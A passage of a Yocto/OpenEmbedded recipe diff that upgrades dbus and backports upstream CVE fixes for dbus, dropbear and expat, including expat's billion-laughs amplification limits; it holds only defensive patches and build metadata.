do_install() {
:
}
diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
+inherit autotools pkgconfig gettext upstream-version-is-even
+
+LICENSE = "AFL-2.1 | GPLv2+"
+LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
+ file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
+ file://tmpdir.patch \
+ file://dbus-1.init \
+ file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
+ file://CVE-2023-34969.patch \
+"
+
+SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
+
+EXTRA_OECONF = "--disable-xml-docs \
+ --disable-doxygen-docs \
+ --disable-libaudit \
+ --enable-largefile \
+ --with-system-socket=/run/dbus/system_bus_socket \
+ "
+EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
+EXTRA_OECONF_append_class-native = " --disable-selinux"
+
+PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
+ user-session \
+ "
+PACKAGECONFIG_class-native = ""
+PACKAGECONFIG_class-nativesdk = ""
+
+PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
+PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
+PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
+
+CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"
diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
-From: Simon McVittie <smcv@collabora.com>
-Date: Thu, 16 Apr 2020 14:45:11 +0100
-Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
-
-MSG_CTRUNC indicates that we have received fewer fds that we should
-have done because the buffer was too small, but we were treating it
-as though it indicated that we received *no* fds. If we received any,
-we still have to make sure we close them, otherwise they will be leaked.
-
-On the system bus, if an attacker can induce us to leak fds in this
-way, that's a local denial of service via resource exhaustion.
-
-Reported-by: Kevin Backhouse, GitHub Security Lab
-Fixes: dbus#294
-Fixes: CVE-2020-12049
-Fixes: GHSL-2020-057
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
-CVE: CVE-2020-12049
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
- 1 file changed, 20 insertions(+), 12 deletions(-)
-
-diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
-index b5fc2466..b176dae1 100644
---- a/dbus/dbus-sysdeps-unix.c
-+++ b/dbus/dbus-sysdeps-unix.c
-@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- struct cmsghdr *cm;
- dbus_bool_t found = FALSE;
-
-- if (m.msg_flags & MSG_CTRUNC)
-- {
-- /* Hmm, apparently the control data was truncated. The bad
-- thing is that we might have completely lost a couple of fds
-- without chance to recover them. Hence let's treat this as a
-- serious error. */
--
-- errno = ENOSPC;
-- _dbus_string_set_length (buffer, start);
-- return -1;
-- }
--
- for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
- if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
- {
-@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- if (!found)
- *n_fds = 0;
-
-+ if (m.msg_flags & MSG_CTRUNC)
-+ {
-+ unsigned int i;
-+
-+ /* Hmm, apparently the control data was truncated. The bad
-+ thing is that we might have completely lost a couple of fds
-+ without chance to recover them. Hence let's treat this as a
-+ serious error. */
-+
-+ /* We still need to close whatever fds we *did* receive,
-+ * otherwise they'll never get closed. (CVE-2020-12049) */
-+ for (i = 0; i < *n_fds; i++)
-+ close (fds[i]);
-+
-+ *n_fds = 0;
-+ errno = ENOSPC;
-+ _dbus_string_set_length (buffer, start);
-+ return -1;
-+ }
-+
- /* put length back (doesn't actually realloc) */
- _dbus_string_set_length (buffer, start + bytes_read);
-
---
-2.25.1
-
diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
+From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
+From: hongjinghao <q1204531485@163.com>
+Date: Mon, 5 Jun 2023 18:17:06 +0100
+Subject: [PATCH] bus: Assign a serial number for messages from the driver
+
+Normally, it's enough to rely on a message being given a serial number
+by the DBusConnection just before it is actually sent. However, in the
+rare case where the policy blocks the driver from sending a message
+(due to a deny rule or the outgoing message quota being full), we need
+to get a valid serial number sooner, so that we can copy it into the
+DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
+message sent to monitors. Otherwise, the dbus-daemon will crash with
+an assertion failure if at least one Monitoring client is attached,
+because zero is not a valid serial number to copy.
+
+This fixes a denial-of-service vulnerability: if a privileged user is
+monitoring the well-known system bus using a Monitoring client like
+dbus-monitor or `busctl monitor`, then an unprivileged user can cause
+denial-of-service by triggering this crash. A mitigation for this
+vulnerability is to avoid attaching Monitoring clients to the system
+bus when they are not needed. If there are no Monitoring clients, then
+the vulnerable code is not reached.
+
+Co-authored-by: Simon McVittie <smcv@collabora.com>
+Resolves: dbus/dbus#457
+(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
+---
+ bus/connection.c | 15 +++++++++++++++
+ dbus/dbus-connection-internal.h | 2 ++
+ dbus/dbus-connection.c | 11 ++++++++++-
+ 3 files changed, 27 insertions(+), 1 deletion(-)
+
+diff --git a/bus/connection.c b/bus/connection.c
+index b3583433..215f0230 100644
+--- a/bus/connection.c
++++ b/bus/connection.c
+@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
+ if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
+ return FALSE;
+
++ /* Make sure the message has a non-zero serial number, otherwise
++ * bus_transaction_capture_error_reply() will not be able to mock up
++ * a corresponding reply for it. Normally this would be delayed until
++ * the first time we actually send the message out from a
++ * connection, when the transaction is committed, but that's too late
++ * in this case.
++ */
++ if (dbus_message_get_serial (message) == 0)
++ {
++ dbus_uint32_t next_serial;
++
++ next_serial = _dbus_connection_get_next_client_serial (connection);
++ dbus_message_set_serial (message, next_serial);
++ }
++
+ if (bus_connection_is_active (connection))
+ {
+ if (!dbus_message_set_destination (message,
+diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
+index 48357321..ba79b192 100644
+--- a/dbus/dbus-connection-internal.h
++++ b/dbus/dbus-connection-internal.h
+@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
+ DBusConnection * _dbus_connection_ref_unlocked (DBusConnection *connection);
+ DBUS_PRIVATE_EXPORT
+ void _dbus_connection_unref_unlocked (DBusConnection *connection);
++DBUS_PRIVATE_EXPORT
++dbus_uint32_t _dbus_connection_get_next_client_serial (DBusConnection *connection);
+ void _dbus_connection_queue_received_message_link (DBusConnection *connection,
+ DBusList *link);
+ dbus_bool_t _dbus_connection_has_messages_to_send_unlocked (DBusConnection *connection);
+diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
+index c525b6dc..09cef278 100644
+--- a/dbus/dbus-connection.c
++++ b/dbus/dbus-connection.c
+@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
+ _dbus_connection_last_unref (connection);
+ }
+
+-static dbus_uint32_t
++/**
++ * Allocate and return the next non-zero serial number for outgoing messages.
++ *
++ * This method is only valid to call from single-threaded code, such as
++ * the dbus-daemon, or with the connection lock held.
++ *
++ * @param connection the connection
++ * @returns A suitable serial number for the next message to be sent on the connection.
++ */
++dbus_uint32_t
+ _dbus_connection_get_next_client_serial (DBusConnection *connection)
+ {
+ dbus_uint32_t serial;
+--
+2.25.1
+
diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
HOMEPAGE = "https://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+require dbus.inc
+
DEPENDS = "expat virtual/libintl autoconf-archive"
RDEPENDS_dbus_class-native = ""
RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
ALLOW_EMPTY_dbus-ptest = "1"
RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
-SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://dbus-1.init \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- file://CVE-2020-12049.patch \
-"
-
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
-
-inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
+inherit useradd update-rc.d
INITSCRIPT_NAME = "dbus-1"
INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
}
-EXTRA_OECONF = "--disable-tests \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
- --enable-largefile \
- --with-system-socket=/run/dbus/system_bus_socket \
- "
-
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-EXTRA_OECONF_append_class-native = " --disable-selinux"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
- user-session \
- "
-
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+EXTRA_OECONF += "--disable-tests"
do_install() {
autotools_do_install
diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
SUMMARY = "A lightweight SSH and SCP implementation"
HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
+DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
SECTION = "console/network"
# some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
RPROVIDES_${PN} = "ssh sshd"
RCONFLICTS_${PN} = "openssh-sshd openssh"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS_${PN}-dev = ""
+
DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
file://dropbear.socket \
file://dropbear.default \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
- ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} "
+ ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
+ file://CVE-2020-36254.patch \
+ file://CVE-2021-36369.patch \
+ "
PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
file://0006-dropbear-configuration-file.patch \
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ size = size * 10 + (*cp++ - '0');
+ if (*cp++ != ' ')
+ SCREWUP("size not delimited");
+- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++ if (*cp == '\0' || strchr(cp, '/') != NULL ||
++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ run_err("error: unexpected filename: %s", cp);
+ exit(1);
+ }
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
+From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
+From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
+Date: Thu, 19 Aug 2021 17:37:14 +0200
+Subject: [PATCH] added option to disable trivial auth methods (#128)
+
+* added option to disable trivial auth methods
+
+* rename argument to match with other ssh clients
+
+* fixed trivial auth detection for pubkeys
+
+[https://github.com/mkj/dropbear/pull/128]
+Upstream-Status: Backport
+CVE: CVE-2021-36369
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ cli-auth.c | 3 +++
+ cli-authinteract.c | 1 +
+ cli-authpasswd.c | 2 +-
+ cli-authpubkey.c | 1 +
+ cli-runopts.c | 7 +++++++
+ cli-session.c | 1 +
+ runopts.h | 1 +
+ session.h | 1 +
+ 8 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/cli-auth.c b/cli-auth.c
+index 2e509e5..6f04495 100644
+--- a/cli-auth.c
++++ b/cli-auth.c
+@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
+ if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
+
+ TRACE(("received msg_userauth_success"))
++ if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
++ dropbear_exit("trivial authentication not allowed");
++ }
+ /* Note: in delayed-zlib mode, setting authdone here
+ * will enable compression in the transport layer */
+ ses.authstate.authdone = 1;
+diff --git a/cli-authinteract.c b/cli-authinteract.c
+index e1cc9a1..f7128ee 100644
+--- a/cli-authinteract.c
++++ b/cli-authinteract.c
+@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
+ m_free(instruction);
+
+ for (i = 0; i < num_prompts; i++) {
++ cli_ses.is_trivial_auth = 0;
+ unsigned int response_len = 0;
+ prompt = buf_getstring(ses.payload, NULL);
+ cleantext(prompt);
+diff --git a/cli-authpasswd.c b/cli-authpasswd.c
+index 00fdd8b..a24d43e 100644
+--- a/cli-authpasswd.c
++++ b/cli-authpasswd.c
+@@ -155,7 +155,7 @@ void cli_auth_password() {
+
+ encrypt_packet();
+ m_burn(password, strlen(password));
+-
++ cli_ses.is_trivial_auth = 0;
+ TRACE(("leave cli_auth_password"))
+ }
+ #endif /* DROPBEAR_CLI_PASSWORD_AUTH */
+diff --git a/cli-authpubkey.c b/cli-authpubkey.c
+index 7cee164..7da1a04 100644
+--- a/cli-authpubkey.c
++++ b/cli-authpubkey.c
+@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
+ buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
+ cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
+ buf_free(sigbuf); /* Nothing confidential in the buffer */
++ cli_ses.is_trivial_auth = 0;
+ }
+
+ encrypt_packet();
+diff --git a/cli-runopts.c b/cli-runopts.c
+index 7d1fffe..6bf8b8e 100644
+--- a/cli-runopts.c
++++ b/cli-runopts.c
+@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ cli_opts.exit_on_fwd_failure = 0;
+ #endif
++ cli_opts.disable_trivial_auth = 0;
+ #if DROPBEAR_CLI_LOCALTCPFWD
+ cli_opts.localfwds = list_new();
+ opts.listen_fwd_all = 0;
+@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ "\tExitOnForwardFailure\n"
+ #endif
++ "\tDisableTrivialAuth\n"
+ #ifndef DISABLE_SYSLOG
+ "\tUseSyslog\n"
+ #endif
+@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
+ return;
+ }
+
++ if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
++ cli_opts.disable_trivial_auth = parse_flag_value(optstr);
++ return;
++ }
++
+ dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
+ }
+diff --git a/cli-session.c b/cli-session.c
+index 56dd4af..73ef0db 100644
+--- a/cli-session.c
++++ b/cli-session.c
+@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
+ /* Auth */
+ cli_ses.lastprivkey = NULL;
+ cli_ses.lastauthtype = 0;
++ cli_ses.is_trivial_auth = 1;
+
+ /* For printing "remote host closed" for the user */
+ ses.remoteclosed = cli_remoteclosed;
+diff --git a/runopts.h b/runopts.h
+index 31eae1f..8519626 100644
+--- a/runopts.h
++++ b/runopts.h
+@@ -154,6 +154,7 @@ typedef struct cli_runopts {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ int exit_on_fwd_failure;
+ #endif
++ int disable_trivial_auth;
+ #if DROPBEAR_CLI_REMOTETCPFWD
+ m_list * remotefwds;
+ #endif
+diff --git a/session.h b/session.h
+index 0f77055..8676054 100644
+--- a/session.h
++++ b/session.h
+@@ -287,6 +287,7 @@ struct clientsession {
+
+ int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
+ for the last type of auth we tried */
++ int is_trivial_auth;
+ int ignore_next_auth_response;
+ #if DROPBEAR_CLI_INTERACT_AUTH
+ int auth_interact_failed; /* flag whether interactive auth can still
diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
SUMMARY = "Embedded Linux Library"
+HOMEPAGE = "https://01.org/ell"
DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
low-level functionality for system daemons. It typically has no \
dependencies other than the Linux kernel, C standard library, and \
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
+From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 19 Apr 2021 21:42:51 +0200
+Subject: [PATCH] expat: Backport fix for CVE-2013-0340
+
+Issue: https://github.com/libexpat/libexpat/issues/34
+
+This patch cherry-picks the following commits from upstream release
+2.4.0 onto 2.2.9:
+
+- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
+- 60959f2b491876199879d97c8ed956eabb0c2e73
+
+Upstream-Status: Backport
+CVE: CVE-2013-0340
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ lib/expat.h | 21 +-
+ lib/internal.h | 30 +
+ lib/libexpat.def | 3 +
+ lib/libexpatw.def | 3 +
+ lib/xmlparse.c | 1147 +++++++++++++++++++++++++++++++++++++--
+ 5 files changed, 1143 insertions(+), 61 deletions(-)
+
+diff --git a/lib/expat.h b/lib/expat.h
+index 48a6e2a3..0fb70d9d 100644
+--- a/lib/expat.h
++++ b/lib/expat.h
+@@ -115,7 +115,9 @@ enum XML_Error {
+ XML_ERROR_RESERVED_PREFIX_XMLNS,
+ XML_ERROR_RESERVED_NAMESPACE_URI,
+ /* Added in 2.2.1. */
+- XML_ERROR_INVALID_ARGUMENT
++ XML_ERROR_INVALID_ARGUMENT,
++ /* Added in 2.4.0. */
++ XML_ERROR_AMPLIFICATION_LIMIT_BREACH
+ };
+
+ enum XML_Content_Type {
+@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
+ XML_FEATURE_SIZEOF_XML_LCHAR,
+ XML_FEATURE_NS,
+ XML_FEATURE_LARGE_SIZE,
+- XML_FEATURE_ATTR_INFO
++ XML_FEATURE_ATTR_INFO,
++ /* Added in Expat 2.4.0. */
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
+ /* Additional features must be added to the end of this enum. */
+ };
+
+@@ -1010,6 +1015,18 @@ typedef struct {
+ XMLPARSEAPI(const XML_Feature *)
+ XML_GetFeatureList(void);
+
++#ifdef XML_DTD
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor);
++
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes);
++#endif
++
+ /* Expat follows the semantic versioning convention.
+ See http://semver.org.
+ */
+diff --git a/lib/internal.h b/lib/internal.h
+index 60913dab..d8b31fa2 100644
+--- a/lib/internal.h
++++ b/lib/internal.h
+@@ -101,10 +101,40 @@
+ # endif
+ #endif
+
++#include <limits.h> // ULONG_MAX
++
++#if defined(_WIN32) && ! defined(__USE_MINGW_ANSI_STDIO)
++# define EXPAT_FMT_ULL(midpart) "%" midpart "I64u"
++# if defined(_WIN64) // Note: modifier "td" does not work for MinGW
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "I64d"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#else
++# define EXPAT_FMT_ULL(midpart) "%" midpart "llu"
++# if ! defined(ULONG_MAX)
++# error Compiler did not define ULONG_MAX for us
++# elif ULONG_MAX == 18446744073709551615u // 2^64-1
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "ld"
++# else
++# define EXPAT_FMT_PTRDIFF_T(midpart) "%" midpart "d"
++# endif
++#endif
++
+ #ifndef UNUSED_P
+ # define UNUSED_P(p) (void)p
+ #endif
+
++/* NOTE BEGIN If you ever patch these defaults to greater values
++ for non-attack XML payload in your environment,
++ please file a bug report with libexpat. Thank you!
++*/
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT \
++ 100.0f
++#define EXPAT_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT \
++ 8388608 // 8 MiB, 2^23
++/* NOTE END */
++
+ #ifdef __cplusplus
+ extern "C" {
+ #endif
+diff --git a/lib/libexpat.def b/lib/libexpat.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpat.def
++++ b/lib/libexpat.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/libexpatw.def b/lib/libexpatw.def
+index 16faf595..5aefa6df 100644
+--- a/lib/libexpatw.def
++++ b/lib/libexpatw.def
+@@ -76,3 +76,6 @@ EXPORTS
+ XML_SetHashSalt @67
+ ; added with version 2.2.5
+ _INTERNAL_trim_to_complete_utf8_characters @68
++; added with version 2.4.0
++ XML_SetBillionLaughsAttackProtectionActivationThreshold @69
++ XML_SetBillionLaughsAttackProtectionMaximumAmplification @70
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 3aaf35b9..6790bc28 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -47,6 +47,8 @@
+ #include <limits.h> /* UINT_MAX */
+ #include <stdio.h> /* fprintf */
+ #include <stdlib.h> /* getenv, rand_s */
++#include <stdint.h> /* uintptr_t */
++#include <math.h> /* isnan */
+
+ #ifdef _WIN32
+ # define getpid GetCurrentProcessId
+@@ -373,6 +375,31 @@ typedef struct open_internal_entity {
+ XML_Bool betweenDecl; /* WFC: PE Between Declarations */
+ } OPEN_INTERNAL_ENTITY;
+
++enum XML_Account {
++ XML_ACCOUNT_DIRECT, /* bytes directly passed to the Expat parser */
++ XML_ACCOUNT_ENTITY_EXPANSION, /* intermediate bytes produced during entity
++ expansion */
++ XML_ACCOUNT_NONE /* i.e. do not account, was accounted already */
++};
++
++#ifdef XML_DTD
++typedef unsigned long long XmlBigCount;
++typedef struct accounting {
++ XmlBigCount countBytesDirect;
++ XmlBigCount countBytesIndirect;
++ int debugLevel;
++ float maximumAmplificationFactor; // >=1.0
++ unsigned long long activationThresholdBytes;
++} ACCOUNTING;
++
++typedef struct entity_stats {
++ unsigned int countEverOpened;
++ unsigned int currentDepth;
++ unsigned int maximumDepthSeen;
++ int debugLevel;
++} ENTITY_STATS;
++#endif /* XML_DTD */
++
+ typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start,
+ const char *end, const char **endPtr);
+
+@@ -403,16 +430,18 @@ static enum XML_Error initializeEncoding(XML_Parser parser);
+ static enum XML_Error doProlog(XML_Parser parser, const ENCODING *enc,
+ const char *s, const char *end, int tok,
+ const char *next, const char **nextPtr,
+- XML_Bool haveMore, XML_Bool allowClosingDoctype);
++ XML_Bool haveMore, XML_Bool allowClosingDoctype,
++ enum XML_Account account);
+ static enum XML_Error processInternalEntity(XML_Parser parser, ENTITY *entity,
+ XML_Bool betweenDecl);
+ static enum XML_Error doContent(XML_Parser parser, int startTagLevel,
+ const ENCODING *enc, const char *start,
+ const char *end, const char **endPtr,
+- XML_Bool haveMore);
++ XML_Bool haveMore, enum XML_Account account);
+ static enum XML_Error doCdataSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+- const char **nextPtr, XML_Bool haveMore);
++ const char **nextPtr, XML_Bool haveMore,
++ enum XML_Account account);
+ #ifdef XML_DTD
+ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ const char **startPtr, const char *end,
+@@ -422,7 +451,8 @@ static enum XML_Error doIgnoreSection(XML_Parser parser, const ENCODING *,
+ static void freeBindings(XML_Parser parser, BINDING *bindings);
+ static enum XML_Error storeAtts(XML_Parser parser, const ENCODING *,
+ const char *s, TAG_NAME *tagNamePtr,
+- BINDING **bindingsPtr);
